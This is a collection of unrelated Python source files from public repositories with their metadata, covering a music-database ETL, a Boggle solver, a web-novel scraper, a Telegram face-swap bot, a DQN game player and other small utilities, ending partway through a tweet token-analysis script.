user_table_create = ("""
CREATE TABLE IF NOT EXISTS users(
user_id int PRIMARY KEY,
first_name varchar NOT NULL,
last_name varchar NOT NULL,
gender varchar,
level varchar)
""")
song_table_create = ("""
CREATE TABLE IF NOT EXISTS songs(
song_id varchar PRIMARY KEY,
title varchar NOT NULL,
artist_id varchar NOT NULL,
year int,
duration float NOT NULL)
""")
artist_table_create = ("""
CREATE TABLE IF NOT EXISTS artists(
artist_id varchar PRIMARY KEY,
name varchar NOT NULL,
location varchar,
latitude float,
longitude float)
""")
time_table_create = ("""
CREATE TABLE IF NOT EXISTS time(
start_time timestamp PRIMARY KEY,
hour int,
day int,
week int,
month int,
year int,
weekday int)
""")
# INSERT RECORDS
songplay_table_insert = ("""INSERT INTO songplays(
start_time,
user_id,
level,
song_id,
artist_id,
session_id,
location,
user_agent) VALUES (%s, %s, %s, %s, %s, %s, %s, %s);
""")
user_table_insert = ("""INSERT INTO users(
user_id,
first_name,
last_name,
gender,
level) VALUES (%s, %s, %s, %s, %s)
ON CONFLICT (user_id) DO UPDATE SET level = excluded.level;
""")
song_table_insert = ("""INSERT INTO songs(
song_id,
title,
artist_id,
year,
duration) VALUES (%s, %s, %s, %s, %s)
ON CONFLICT (song_id) DO NOTHING;
""")
artist_table_insert = ("""INSERT INTO artists(
artist_id,
name,
location,
latitude,
longitude) VALUES (%s, %s, %s, %s, %s)
ON CONFLICT (artist_id) DO NOTHING;
""")
time_table_insert = ("""INSERT INTO time(
start_time,
hour,
day,
week,
month,
year,
weekday) VALUES (%s, %s, %s, %s, %s, %s, %s)
ON CONFLICT (start_time) DO NOTHING;
""")
# FIND SONGS
song_select = ("""
SELECT songs.song_id, artists.artist_id
FROM songs
JOIN artists ON songs.artist_id = artists.artist_id
WHERE songs.title = %s AND artists.name = %s AND songs.duration = %s
""")
# QUERY LISTS
create_table_queries = [user_table_create, song_table_create, artist_table_create, time_table_create, songplay_table_create]
drop_table_queries = [songplay_table_drop, user_table_drop, song_table_drop, artist_table_drop, time_table_drop]
|
[
"noreply@github.com"
] |
sgouda0412.noreply@github.com
|
cf81f7f02c8e5bd99840dcdbdcde1acf8539439e
|
4c7bec048e4e1a8676d83d73488eaf9a532d1be2
|
/stanCode_Projects/boggle_game_solver/boggle.py
|
ea43e60390faee5ae1a677ba663253270e29281d
|
[
"MIT"
] |
permissive
|
yutaotseng/sc-projects
|
32601b06fb16ae50784093f91898bf11a379daa5
|
67824242502a813e32f5c3a4bf04e0bafeded174
|
refs/heads/main
| 2023-04-22T07:46:29.291722
| 2021-05-03T23:58:28
| 2021-05-03T23:58:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,618
|
py
|
"""
File: boggle.py
Name:
----------------------------------------
TODO:
"""
# This is the file name of the dictionary txt file
# we will be checking if a word exists by searching through it
FILE = 'dictionary.txt'
# Global variables
DICTIONARY = {} # The dictionary that could be used to determine whether the word exist.
BOGGLE_DIC = {} # The dictionary that contains coordinate(key) and its corresponding letter(value).
ANS_LST = [] # The list that stores all the ans.
def main():
"""
TODO:
"""
read_dictionary()
enter_row()
boggle()
print(f'There are {len(ANS_LST)} words in total.')
def boggle():
for key in BOGGLE_DIC:
(x, y) = key
ans_coordinate = [(x, y)]
boggle_helper(x, y, BOGGLE_DIC[(x, y)], ans_coordinate)
def boggle_helper(x, y, ans, ans_coordinate):
for i in range(-1, 2, 1): # in order to find neighbor pixel
for j in range(-1, 2, 1): # in order to find neighbor pixel
if 0 <= x + i < 4:
if 0 <= y + j < 4:
if (x + i, y + j) not in ans_coordinate:
if ans in DICTIONARY and ans not in ANS_LST:
ANS_LST.append(ans)
print(f'Found: "{ans}"')
# Choose
ans_coordinate.append((x + i, y + j))
ans += BOGGLE_DIC[(x + i, y + j)]
# Explore
if has_prefix(ans):
boggle_helper(x + i, y + j, ans, ans_coordinate)
# Un-choose
ans_coordinate.pop()
ans = ans[:len(ans) - 1]
def enter_row():
global BOGGLE_DIC
letter_lst = []
while True:
if len(letter_lst) == 4:
break
else:
row = input(f'{len(letter_lst) + 1} row of letters: ')
row = row.lower()
row = row.split()
if row_letter_check(row):
letter_lst.append(row)
# Convert list into dictionary
for i in range(len(letter_lst)):
for j in range(len(letter_lst[i])):
BOGGLE_DIC[i, j] = letter_lst[i][j]
def row_letter_check(row):
if not len(row) == 4:
print('Illegal Format!!!')
return False
for letter in row:
if not letter.isalpha() or not len(letter) == 1:
print('Illegal Format!!!')
return False
return True
def read_dictionary():
"""
    This function reads the file "dictionary.txt" stored in FILE
    and stores each word as a key of the global DICTIONARY dict
"""
with open(FILE, 'r') as f:
for line in f:
if len(line) > 4:
DICTIONARY[(line.strip())] = 1
return DICTIONARY
def has_prefix(sub_s):
"""
:param sub_s: (str) A substring that is constructed by neighboring letters on a 4x4 square grid
:return: (bool) If there is any words with prefix stored in sub_s
"""
for word in DICTIONARY:
        if word.startswith(sub_s):
return True
return False
if __name__ == '__main__':
main()
|
[
"noreply@github.com"
] |
yutaotseng.noreply@github.com
|
f9af3b9879359fec58bec1214e818391aa80651f
|
ca4a863486a63698af9d4e12f06680454564ebd4
|
/wen/novel/novel2.py
|
c4ddfdf5a69394f93b52a7d1ced0339db1ff65b8
|
[] |
no_license
|
yiliqsmy/pythonsrc
|
39874ecf9dce8d428477a19bf92cc8e42f2d035e
|
651166c5b5f8edb4910dcf8f52d2b311870151ae
|
refs/heads/master
| 2021-01-22T02:52:52.969355
| 2018-04-16T08:12:13
| 2018-04-16T08:12:13
| 102,255,896
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,822
|
py
|
#!python3
#coding=utf-8
# usable
# scrape novel content from the Wuxia Leyuan site
# no chapter titles are saved
from bs4 import BeautifulSoup
import urllib.request
import re
import time
start = time.perf_counter()
title=[] # novel/chapter titles
href=[] # chapter links
#url = 'http://www.biquge.tw/26_26491/'
url = 'http://www.xs.la/153_153933/'
response = urllib.request.urlopen(url)
html_cont=response.read()
soup = BeautifulSoup(html_cont, 'html.parser', from_encoding='utf-8')
hrefAndname = soup.find("div", {"id":"list"}).findAll("a")
#for item in hrefAndname:
# href.append(item['href'])
for item in hrefAndname: # save the titles and links
if re.findall(re.compile(u"[\u4e00-\u9fa5]"),item.text):
# print item.text.encode('utf-8')
title.append(item.text)
href.append(item['href'])
wen = []
for i in range(len(href)):
try:
print ("爬取第"+str(i+1)+"章中……")
newurl = 'http://www.biquge.tw'+ href[i]
response = urllib.request.urlopen(newurl)
html_cont = response.read()
soup = BeautifulSoup(html_cont, 'html.parser', from_encoding='utf-8')
content = soup.find("div", {"id":"content"})
cont=str(content)
cont = re.sub(r'<\s*script[^>]*>[^<]*<\s*/\s*script\s*>','',cont)
        cont = re.sub(r'</div>','',cont) # strip closing div tags
        cont = re.sub(r'<div\s\S*>','',cont) # strip opening div tags
        cont = re.sub(r'<br/>','\n',cont) # replace <br/> tags with newlines
# f = open("E:/res/"+ str(i+1)+ ' .txt','w')
wen.append(cont)
# print(cont)
# print(wen)
except:
print ("错误, 爬取第"+str(i+1)+"章失败")
file_path=r"24.txt"
fp = open(file_path, "w", encoding='utf-8')
print(wen)
for item in wen:
    fp.write(str(item) + "\n") # one list item per line
fp.close()
print ("成功")
end = time.perf_counter()
print('运行: %s 秒'%(end-start))
|
[
"noreply@github.com"
] |
yiliqsmy.noreply@github.com
|
bebb9050c6ad3e53c38b82beaa8f92cc5565661d
|
d0d333c995766c35e10c8bcc8ecffdf167dad93c
|
/wavefront_api_client/models/access_control_list_write_dto.py
|
0350d2ca722b0a40379ab28b8a66a32c74ecf3de
|
[
"Apache-2.0"
] |
permissive
|
weisinchong-okta/python-client
|
283cc67e49a56f50e41ee6f6b1c9e5dae9b33cb0
|
c211f607f2182ed687e339a403d82408f08291b5
|
refs/heads/master
| 2022-12-20T18:02:42.704602
| 2020-09-17T15:16:20
| 2020-09-17T15:16:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,443
|
py
|
# coding: utf-8
"""
Wavefront REST API
<p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \"Authorization: Bearer <<API-TOKEN>>\" to your HTTP requests.</p> # noqa: E501
OpenAPI spec version: v2
Contact: chitimba@wavefront.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class AccessControlListWriteDTO(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'entity_id': 'str',
'modify_acl': 'list[str]',
'view_acl': 'list[str]'
}
attribute_map = {
'entity_id': 'entityId',
'modify_acl': 'modifyAcl',
'view_acl': 'viewAcl'
}
def __init__(self, entity_id=None, modify_acl=None, view_acl=None): # noqa: E501
"""AccessControlListWriteDTO - a model defined in Swagger""" # noqa: E501
self._entity_id = None
self._modify_acl = None
self._view_acl = None
self.discriminator = None
if entity_id is not None:
self.entity_id = entity_id
if modify_acl is not None:
self.modify_acl = modify_acl
if view_acl is not None:
self.view_acl = view_acl
@property
def entity_id(self):
"""Gets the entity_id of this AccessControlListWriteDTO. # noqa: E501
The entity Id # noqa: E501
:return: The entity_id of this AccessControlListWriteDTO. # noqa: E501
:rtype: str
"""
return self._entity_id
@entity_id.setter
def entity_id(self, entity_id):
"""Sets the entity_id of this AccessControlListWriteDTO.
The entity Id # noqa: E501
:param entity_id: The entity_id of this AccessControlListWriteDTO. # noqa: E501
:type: str
"""
self._entity_id = entity_id
@property
def modify_acl(self):
"""Gets the modify_acl of this AccessControlListWriteDTO. # noqa: E501
List of users and user groups ids that have modify permission # noqa: E501
:return: The modify_acl of this AccessControlListWriteDTO. # noqa: E501
:rtype: list[str]
"""
return self._modify_acl
@modify_acl.setter
def modify_acl(self, modify_acl):
"""Sets the modify_acl of this AccessControlListWriteDTO.
List of users and user groups ids that have modify permission # noqa: E501
:param modify_acl: The modify_acl of this AccessControlListWriteDTO. # noqa: E501
:type: list[str]
"""
self._modify_acl = modify_acl
@property
def view_acl(self):
"""Gets the view_acl of this AccessControlListWriteDTO. # noqa: E501
List of users and user group ids that have view permission # noqa: E501
:return: The view_acl of this AccessControlListWriteDTO. # noqa: E501
:rtype: list[str]
"""
return self._view_acl
@view_acl.setter
def view_acl(self, view_acl):
"""Sets the view_acl of this AccessControlListWriteDTO.
List of users and user group ids that have view permission # noqa: E501
:param view_acl: The view_acl of this AccessControlListWriteDTO. # noqa: E501
:type: list[str]
"""
self._view_acl = view_acl
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(AccessControlListWriteDTO, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AccessControlListWriteDTO):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"svc.wf-jenkins@vmware.com"
] |
svc.wf-jenkins@vmware.com
|
922885bccc22f2688984318bdc19be7a112e2453
|
c7e765a9bed33d3bfb21774e3995bf4a09e04add
|
/adminmgr/media/code/config/reducer.py
|
7ac6b3cdc07b7dc35ae5dc456f15d4c509e2e397
|
[
"Apache-2.0"
] |
permissive
|
IamMayankThakur/test-bigdata
|
13dd2ac7fb76c9baed6c3a0aa943057a22e2d237
|
7f507918c7bec31c92eedcd94491a83486623049
|
refs/heads/master
| 2022-05-03T00:59:44.127494
| 2022-02-10T19:50:16
| 2022-02-10T19:50:16
| 201,585,028
| 10
| 4
|
Apache-2.0
| 2022-04-22T23:39:45
| 2019-08-10T05:34:09
|
Python
|
UTF-8
|
Python
| false
| false
| 680
|
py
|
#!/usr/bin/python
import csv
from operator import itemgetter
import sys
current_count = 0
current_key = ""
for line in sys.stdin:
    line = line.strip()
    line_val = line.split("\t")
    key, val = line_val[0], line_val[1]
    try:
        count = int(val)
    except ValueError:
        continue
    if current_key == key:
        current_count += count
    else:
        if current_key != "":
            print('%s\t%s' % (current_key, str(current_count)))
        # start the tally for the new key with the count just read
        current_count = count
        current_key = key
# emit the final key, if any input was read
if current_key != "":
    print('%s\t%s' % (current_key, str(current_count)))
|
[
"ubuntu@ip-172-31-44-5.ec2.internal"
] |
ubuntu@ip-172-31-44-5.ec2.internal
|
156d7ffb716e8ce8cee4b9395a152b8fc5bbb914
|
82fce9aae9e855a73f4e92d750e6a8df2ef877a5
|
/Lab/venv/lib/python3.8/site-packages/OpenGL/EGL/KHR/platform_wayland.py
|
d385a0144d17f34fc2c79b6cca75b21e88003881
|
[] |
no_license
|
BartoszRudnik/GK
|
1294f7708902e867dacd7da591b9f2e741bfe9e5
|
6dc09184a3af07143b9729e42a6f62f13da50128
|
refs/heads/main
| 2023-02-20T19:02:12.408974
| 2021-01-22T10:51:14
| 2021-01-22T10:51:14
| 307,847,589
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 580
|
py
|
'''OpenGL extension KHR.platform_wayland
This module customises the behaviour of the
OpenGL.raw.EGL.KHR.platform_wayland to provide a more
Python-friendly API
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/KHR/platform_wayland.txt
'''
from OpenGL.raw.EGL.KHR.platform_wayland import _EXTENSION_NAME
def glInitPlatformWaylandKHR():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
|
[
"rudnik49@gmail.com"
] |
rudnik49@gmail.com
|
9a4949accaca75d37fe339320fedcbb5a7ca795e
|
d94938f9c2eff44eebac9dbfec806f2a997d7642
|
/ascii_art_generator.py
|
a312307b625b80b424c8adc2b673bdae4bc2f68e
|
[] |
no_license
|
skmhrk1209/AsciiArtGenerator
|
6ecfc4d8c6c7593e7a321eabcbffe79d98deec06
|
3e6f386eece6fa6b459e533775a635d432ad4a12
|
refs/heads/master
| 2020-03-30T17:18:35.606449
| 2018-10-03T21:23:47
| 2018-10-03T21:23:47
| 151,449,790
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,828
|
py
|
import numpy as np
import cv2
import sys
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--filename", type=str)
parser.add_argument('--width', type=int, default=100)
parser.add_argument("--height", type=int, default=100)
parser.add_argument('--exponent', type=float, default=2)
parser.add_argument('--stddev', type=float, default=0.1)
parser.add_argument('--invert', action="store_true")
args = parser.parse_args()
ascii_codes = [
"01!2\"3#4$5%6&7'8(9)-=^~\\",
"|qQwWeErRtTyYuUiIoOpP@`[",
"{aAsSdDfFgGhHjJkKlL;+:*]",
"}zZxXcCvVbBnNmMmM,<.>/?_",
"123456789012345678901234"
]
ascii_codes_image = cv2.imread("ascii_codes.png")
ascii_codes_image = cv2.cvtColor(ascii_codes_image, cv2.COLOR_BGR2GRAY)
ascii_codes_image = ascii_codes_image.astype(np.float32) / 255.0
h = ascii_codes_image.shape[0] // 5
w = ascii_codes_image.shape[1] // 24
brightnesses = sorted([
(ascii_codes[j][i], np.mean(ascii_codes_image[j * h: (j + 1) * h, i * w:(i + 1) * w]))
for j in range(5) for i in range(24)
], key=lambda item: item[1])
def linear_search(target_brightness):
for i, (_, brightness) in enumerate(brightnesses):
if brightness > target_brightness:
break
return brightnesses[int(np.clip(np.random.normal(loc=i, scale=args.stddev), 0, len(brightnesses) - 1))][0]
image = cv2.imread(args.filename)
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
image = cv2.bitwise_not(image) if args.invert else image
image = image.astype(np.float32) / 255.0
image = image ** args.exponent
h = image.shape[0] // args.height
w = image.shape[1] // args.width
ascii_art = ["".join([linear_search(np.mean(image[j * h: (j + 1) * h, i * w:(i + 1) * w]))
for i in range(args.width)]) for j in range(args.height)]
for line in ascii_art:
print(line)
|
[
"hirokisakuma@HirokinoMacBook-puro.local"
] |
hirokisakuma@HirokinoMacBook-puro.local
|
78cbd4ec39cc60e94d371042f90b02430a79308e
|
fc164822518577b909c8c2b7c4c679c7086b49a7
|
/esha_sketch/esha_sketch.pyde
|
fe38ab9d625ef8ed7d50572434d80cb23c9d6b5e
|
[
"MIT"
] |
permissive
|
alechapp/Processingcodes
|
383ff82524d9c29eebedc4bdcac2f98f328307e1
|
883c4b2b98382ff2772962b141beea0d2df0397b
|
refs/heads/master
| 2020-12-11T15:29:27.214183
| 2020-01-28T15:15:11
| 2020-01-28T15:15:11
| 233,885,520
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 651
|
pyde
|
delta = 5
x=450
y=450
def setup():
size(900,900)
background(128)
def draw():
global delta
global x, y
strokeWeight(5)
px = x
py = y
line(x,y,x,y)
if keyPressed :
if keyCode == UP :
y = y - delta
if keyCode == DOWN :
y = y + delta
if keyCode == LEFT :
x = x - delta
if keyCode == RIGHT :
x = x + delta
if x > 900 :
x = 900
if x < 0 :
x = 1
if y < 0 :
y = 1
if y > 900 :
y = 900
line(x, y, px, py)
if key == " " :
background(128)
|
[
"1935096@champlaincollege.qc.ca"
] |
1935096@champlaincollege.qc.ca
|
92a7c11b7cc70da8e097808ca9a4fc2975c90476
|
5e23ea6415d15121ce42f027e7f6b47b44f0dfc3
|
/ch05_plucker_test.py
|
8ecdd69df01582840c8c67e4970651bf6e63cd2d
|
[] |
no_license
|
openstake/hacking_rss_and_atom
|
e165419e8e3aee8ff71cc82ff50479b0a47fd335
|
a925c3bd9580c2d0463e4b645d2a84dec0109818
|
refs/heads/master
| 2021-01-16T19:04:12.635945
| 2008-11-02T01:41:18
| 2008-11-02T01:41:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 741
|
py
|
#!/usr/bin/env python
"""
ch05_plucker_test.py
Take the Plucker Distiller out for a test drive.
"""
import sys, time
import PyPlucker.Spider
HTML_FN = "http://www.decafbad.com"
PLUCKER_DIR = "."
PLUCKER_TITLE = "Sample Plucker Document"
PLUCKER_FN = "plucker-%s" % time.strftime("%Y%m%d-%H%M%S")
PLUCKER_BPP = 8
PLUCKER_DEPTH = 1
def main():
"""
    Call the Plucker Distiller to output a test document.
"""
PyPlucker.Spider.realmain(None, argv=[
sys.argv[0],
'-P', PLUCKER_DIR,
'-f', PLUCKER_FN,
'-H', HTML_FN,
'-M', PLUCKER_DEPTH,
'-N', PLUCKER_TITLE,
'--bpp', PLUCKER_BPP,
'--title=%s' % PLUCKER_TITLE,
])
if __name__ == "__main__": main()
|
[
"l.m.orchard@pobox.com"
] |
l.m.orchard@pobox.com
|
175cfa7ed4443434932254d51d0798af3a098976
|
ce2df66c61ab634043ceeacc8678cd5fd94f2e77
|
/CS4701/DQN/play.py
|
a01f8e7fc55938d5afa89e051852a61547ac7a44
|
[] |
no_license
|
bayoumi17m/CS4701_Final_Proj
|
6ced6108866d71d1b16e52ce7bbc67ca5d665847
|
4c287f7866263373d45a6df9965ac8149c0cc3c1
|
refs/heads/master
| 2020-04-10T19:45:11.599289
| 2018-12-10T22:46:36
| 2018-12-10T22:46:36
| 161,245,961
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,606
|
py
|
import matplotlib
matplotlib.use("Agg")
from DQN import DuelingDQNPrioritizedReplay
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import gym
from gym.wrappers import Monitor
import warnings
import os
import time
def play(agent,env):
load_path = "./tmp/PRmem/model.ckpt"
agent.load(load_path)
obs = env.reset()
score = 0
steps = 0
done = False
index =[]
val = []
    while not done:
steps += 1
index.append(steps)
#action = agent.pick_action(obs)
obs, rewards, done, _ = env.step(env.action_space.sample())
val.append(rewards)
score += rewards
env.render()
time.sleep(0.1)
if __name__ == "__main__":
config = tf.ConfigProto()
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
config.gpu_options.allow_growth = True
sess = tf.Session(config= config)
env = gym.make('MsPacman-ram-v0')
MEMORY_SIZE = 5000
ACTION_SPACE = 9
OBSERVATION_SPACE = 128 # 210*160*3
EPISODES = 1
STEPS = 45000
IMAGE_WIDTH = 210
IMAGE_HEIGHT = 160
IMAGE_CHANNELS = 3
with tf.variable_scope('PRmem'):
prmem_DQN = DuelingDQNPrioritizedReplay(
n_actions=ACTION_SPACE, n_features=OBSERVATION_SPACE, memory_size=MEMORY_SIZE, epsilon=0,
epsilon_increment=0, sess=sess, dueling=False, output_graph=True,
prioritized=True,image_data=False,image_shape=(IMAGE_WIDTH,IMAGE_HEIGHT,IMAGE_CHANNELS))
print("Prioritized Replay DQN Built")
sess.run(tf.global_variables_initializer())
play(prmem_DQN,env)
|
[
"git"
] |
git
|
269d5c736ca6558cbb4c1639d58642d37ac50aa6
|
3ad49ad1106438bc7bd9e7872e3b1ca066c3bffa
|
/Demo_w3/Demo_w3.py
|
d044202fe8a49e07697c080368311cdd365fc5e9
|
[] |
no_license
|
Anvilondre/opencv-demos
|
606952be5b1211ec98fa07cc1537d986e7eb52c4
|
584b382a6d6102d69ca2d9e98957095cdd7f1794
|
refs/heads/master
| 2022-12-11T15:09:09.566455
| 2020-09-07T09:49:25
| 2020-09-07T09:49:25
| 286,213,902
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,136
|
py
|
import time
import cv2
import telebot
from itertools import cycle
from data.Token import token
from glob import glob
bot = telebot.TeleBot(token=token)
def write_counter():
global counter
with open('data/counter.txt', 'w') as w:
w.write(str(counter))
@bot.message_handler(content_types=['photo'])
def handle_image(message):
global counter, deep_face # Counter is just for naming purposes
counter += 1
write_counter()
raw = message.photo[-1].file_id
src_path = f'data/scr_imgs/{counter}.jpg'
res_path = f'data/res_imgs/{counter}.jpg'
# Downloading a received picture to process it with OpenCV
file_info = bot.get_file(raw)
downloaded_file = bot.download_file(file_info.file_path)
with open(src_path, 'wb') as new_file:
new_file.write(downloaded_file)
pic = deep_face.process_picture(src_path)
cv2.imwrite(res_path, pic) # Saving the result to send it back
with open(res_path, 'rb') as f:
bot.send_photo(message.chat.id, f)
def find_face_positions(img, classifier):
"""Finds all the faces on image and returns an array of (x, y, w, h) tuples."""
image_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
image_gray = cv2.equalizeHist(image_gray)
faces = classifier.detectMultiScale(image_gray)
return faces
class Face_Replacer:
def __init__(self, mask_images: iter):
# Initializing a built-in cascade classifier to detect faces
self.face_cascade = cv2.CascadeClassifier()
self.face_cascade.load(cv2.samples.findFile('data/haarcascades/haarcascade_frontalface_alt.xml'))
self.mask_images = mask_images
def overlay_image(self, background, x, y, w, h):
"""Scales foreground image to (w, h) size and adds it to the background image at (x, y) - top left corner."""
replacement = cv2.resize(next(self.mask_images), (w, h), cv2.INTER_CUBIC)
img = background.copy()
roi = img[y:y + h, x:x + w]
img2gray = cv2.cvtColor(replacement, cv2.COLOR_BGR2GRAY)
ret, mask = cv2.threshold(img2gray, 10, 255, cv2.THRESH_BINARY)
mask_inv = cv2.bitwise_not(mask)
img1_bg = cv2.bitwise_and(roi, roi, mask=mask_inv)
img2_fg = cv2.bitwise_and(replacement, replacement, mask=mask)
dst = cv2.add(img1_bg, img2_fg)
img[y: y + h, x:x + w] = dst
return img
def add_faces(self, img, faces):
"""Replaces all the faces if any found. Otherwise just adds a face in the bottom middle."""
res_img = img.copy()
if faces is None or len(faces) == 0:
w, h = res_img.shape[1] // 5, res_img.shape[0] // 3
x, y = res_img.shape[1] // 2 - w // 2, res_img.shape[0] - h
res_img = self.overlay_image(res_img, x, y, w, h)
for face in sorted(faces, key=lambda x: x[2] * x[3]):
face[2], face[3] = 0.9 * face[2], 1.1 * face[3]
face[0] += face[2] * 0.05
res_img = self.overlay_image(res_img, *face)
return res_img
def process_picture(self, file_name):
"""Connects everything together."""
# We need to make sure there are exactly 4 channels: BGR + Alpha
source_img = y if (y := cv2.imread(file_name, cv2.IMREAD_UNCHANGED)).shape[2] == 4 \
else cv2.cvtColor(y, cv2.COLOR_BGR2BGRA)
# Detect faces on image
faces = find_face_positions(source_img, self.face_cascade)
# Image with added/replaced faces
img = self.add_faces(source_img, faces)
return img
if __name__ == '__main__':
global counter, deep_face
# Creating an iterator for replacement faces
face_masks = cycle(cv2.imread(y, cv2.IMREAD_UNCHANGED) for y in glob('data/replacement_imgs/*.png'))
deep_face = Face_Replacer(face_masks)
with open('data/counter.txt', 'r') as r:
counter = int(r.read())
# If bot encounters some unpredictable stuff just wait some time and reload
while True:
try:
bot.polling()
except Exception:
print(f"Something went wrong! Image number: {counter}")
time.sleep(5)
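# Assumed data layout, inferred from the paths used above (illustrative only):
#   data/Token.py                  -> defines `token` for the Telegram bot
#   data/counter.txt               -> persisted image counter (a single integer)
#   data/haarcascades/haarcascade_frontalface_alt.xml -> face detector model
#   data/replacement_imgs/*.png    -> overlay faces cycled through by Face_Replacer
#   data/scr_imgs/, data/res_imgs/ -> downloaded sources and processed results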
|
[
"buracov.r@gmail.com"
] |
buracov.r@gmail.com
|
7483e278a896a2948b61ea14a2dc2de8518a7668
|
74cef976fc2550e9569249ed0453f9940848779f
|
/litedb/utils/io.py
|
342149be3fd108e119a403a27542d8c7d0e1bdac
|
[
"MIT"
] |
permissive
|
JonathanVusich/litedb
|
3c2383ddd4d332c84cb68d543f81702b20b10aa0
|
c750b9045c353b7f57dddb028410ec67f8b23a46
|
refs/heads/master
| 2021-06-29T17:23:49.730232
| 2020-10-24T20:07:08
| 2020-10-24T20:07:08
| 178,241,331
| 17
| 4
|
MIT
| 2020-10-24T20:07:09
| 2019-03-28T16:22:55
|
Python
|
UTF-8
|
Python
| false
| false
| 608
|
py
|
import os
import shutil
import stat
def _remove_readonly(func, path, _):
"""Clear the readonly bit and reattempt the removal."""
os.chmod(path, stat.S_IWRITE)
func(path)
def rmdir(directory):
"""Removes the given directory entirely."""
shutil.rmtree(directory, onerror=_remove_readonly)
def empty_directory(directory) -> None:
"""Removes the contents of a directory."""
with os.scandir(directory) as dir_contents:
for entry in dir_contents:
if entry.is_file():
os.unlink(entry)
if entry.is_dir():
rmdir(entry)
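# A minimal usage sketch (assumed example, not part of the original module):
# creates a scratch directory containing a file and a subdirectory, empties it,
# then removes the directory itself. The 'scratch' path is hypothetical.
if __name__ == '__main__':
    os.makedirs('scratch/sub', exist_ok=True)
    with open('scratch/file.txt', 'w') as handle:
        handle.write('temp')
    empty_directory('scratch')  # 'scratch' still exists but is now empty
    rmdir('scratch')            # remove the (now empty) directory entirely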
|
[
"31666175+JonathanVusich@users.noreply.github.com"
] |
31666175+JonathanVusich@users.noreply.github.com
|
ef0bb93629487c699f237c6e02ba5d17751c0818
|
b39b8e103fb07378dc267b50b2617319a5017c7d
|
/backend/4. TokenAnalysis/Main - TokenAnalysis.py
|
22bb49e9896cc6942d8b81b6c9bca50e73f100f0
|
[] |
no_license
|
mirkolai/mappa.controlodio.it
|
386995d7e9a150b2d91dddcb0a54616190803d99
|
751bc35810866c38714170df4693589cc5bf3c88
|
refs/heads/master
| 2023-06-29T21:01:24.471836
| 2021-07-29T15:03:46
| 2021-07-29T15:03:46
| 388,529,437
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,227
|
py
|
from nltk import word_tokenize
__author__ = 'mirko'
import pymysql
import traceback
import logging
import os,sys,inspect
import re
import nltk
nltk.download('stopwords')
#nltk.download('punkt')
from nltk.corpus import stopwords
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0,parentdir)
import config as cfg
db = pymysql.connect(host=cfg.mysql['host'],
user=cfg.mysql['user'],
passwd=cfg.mysql['passwd'],
db=cfg.mysql['db'],
charset='utf8mb4'#,
#use_unicode=True
)
cur = db.cursor()
cur.execute('SET NAMES utf8mb4')
cur.execute("SET CHARACTER SET utf8mb4")
cur.execute("SET character_set_connection=utf8mb4")
db.commit()
"""
Questo script si occupa di monitorare la frequenza gionaliera di word, hashtag e mention.
"""
# delete tokens that are not significant enough in the historical counts
cur.execute(" DELETE FROM daily_word_frequency "
" WHERE `count` <= 10")
db.commit()
# delete tokens that are not significant enough in the historical counts
cur.execute(" DELETE FROM daily_co_occurrence_word_frequency "
" WHERE `count` <= 10")
db.commit()
def extract_hashtags(text):
return re.findall("#(\w+)",text.lower())
def extract_mentions(text):
return re.findall("@(\w+)",text.lower())
def extract_words(text,stop_words,keywords):
text=re.sub(u"(https|http)?:\/\/(\w|\.|\/|\?|\=|\&|\%)*\b"," ",text)
text = re.sub(u"[^a-záàâåãäçèéêëìíîïñòóùúüÿßøæ#@]"," ",text)
filtered_sentence = []
for w in text.split(" "):
if w not in stop_words and len(w)>2 and len(w)<100:
flag = True
for keyword in keywords:
if "*" in keyword:
if re.findall(u""+keyword.replace("*", "") +"[haei]{1,2}", w.strip()):
flag = False
elif "#" in keyword:
if re.findall(u""+ keyword + "[rtaeio]{2}", w.strip()):
flag = False
elif re.findall(u""+ keyword +"", w.strip()):
flag = False
if flag:
filtered_sentence.append(w)
return filtered_sentence
cur.execute(" SELECT `id`, topic, `text`, `year`, `month`, `day`, `week_year`,"
